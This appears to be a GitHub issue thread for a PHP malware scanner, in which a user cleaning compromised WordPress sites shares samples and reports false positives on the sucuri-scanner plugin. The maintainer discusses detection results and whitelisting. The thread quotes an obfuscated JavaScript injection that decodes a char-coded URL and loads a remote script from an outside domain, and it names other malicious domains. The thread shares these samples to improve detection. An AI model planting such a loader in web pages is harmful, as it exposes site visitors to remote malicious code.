Closed darkworks closed 4 years ago
scr34m
commented
4 years ago I'm afraid that URL check is not be possible, only code sample matches and we check only PHP in first hand.
For the sucuri-scanner please provide a release site where i can download and generate hash for whitelisting.
scr34m
commented
4 years ago Let me check attached archives and soon i will update the database, thanks
scr34m
commented
4 years ago Only 2 of the samples are not detected, are you using up to date version?
# ER # {/sample 2/search.php}
# ER # {/sample 2/pas.php}
# ER # {/sample 2/s_eval.php}
# ER # {/sample 2/accesson.php}
# ER # {/sample 2/s_noeval.php}
# ER # {/sample 1/wp-mailing.php}
# ER # {/sample 1/wp-vcd.php}
# OK # {/sample 1/index.php}
# ER # {/sample 1/cache-ssxelgwcnhoxnfoc.php}
# ER # {/sample 1/cache-ztopvwnwtfqnsefb.php}
# ER # {/sample 1/wp-craft-report.php}
# OK # {/sample 1/wp-tmp.php}I see the SCRIPT tags, but these domains frequently changes and currently i didn't know any database to checks against, because with a new flag we may can send to check.
Found this https://hybrid-analysis.com/sample/8afc3ad8b29ed3695dc0f0ddecfb592560d22f95cdeb95fc5293633c63b43261?environmentId=100 for pushosubk.com/ntfc.php?p=2857367 and they have a public API, so we can implement a query for them with provided API key https://hybrid-analysis.com/docs/api/v2
scr34m
commented
4 years ago Not listed:
So this only works when users reporting URL-s
darkworks
commented
4 years ago sucuri-scanner
ok here is download link of sucuri scanner : https://wordpress.org/plugins/sucuri-scanner/
darkworks
commented
4 years ago Only 2 of the samples are not detected, are you using up to date version?
# ER # {/sample 2/search.php} # ER # {/sample 2/pas.php} # ER # {/sample 2/s_eval.php} # ER # {/sample 2/accesson.php} # ER # {/sample 2/s_noeval.php} # ER # {/sample 1/wp-mailing.php} # ER # {/sample 1/wp-vcd.php} # OK # {/sample 1/index.php} # ER # {/sample 1/cache-ssxelgwcnhoxnfoc.php} # ER # {/sample 1/cache-ztopvwnwtfqnsefb.php} # ER # {/sample 1/wp-craft-report.php} # OK # {/sample 1/wp-tmp.php}
ya i just came across it and clone it from github today.
darkworks
commented
4 years ago one Question , can we write output to file , i think their is no flag for file output , as where there are a lot of matches the output is hidden by ssh clients like putty , they shrink output on terminal . so will be good to have write to file flag
scr34m
commented
4 years ago You can use "--output-format " to change the format so no special characters will do any harm, and also only piping the output, currently no option for file logging.
darkworks
commented
4 years ago ok great
scr34m
commented
4 years ago Whitelist updated with recent version of sucuri-scanner
Hi here are some samples of malicious code i found during cleaning up few wordpress sites , i think it will be good to add it to the tool
var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }also i noticed the tool trigger on wordpress top plugin : sucuri-scanner
sample 1.zip sample 2.zip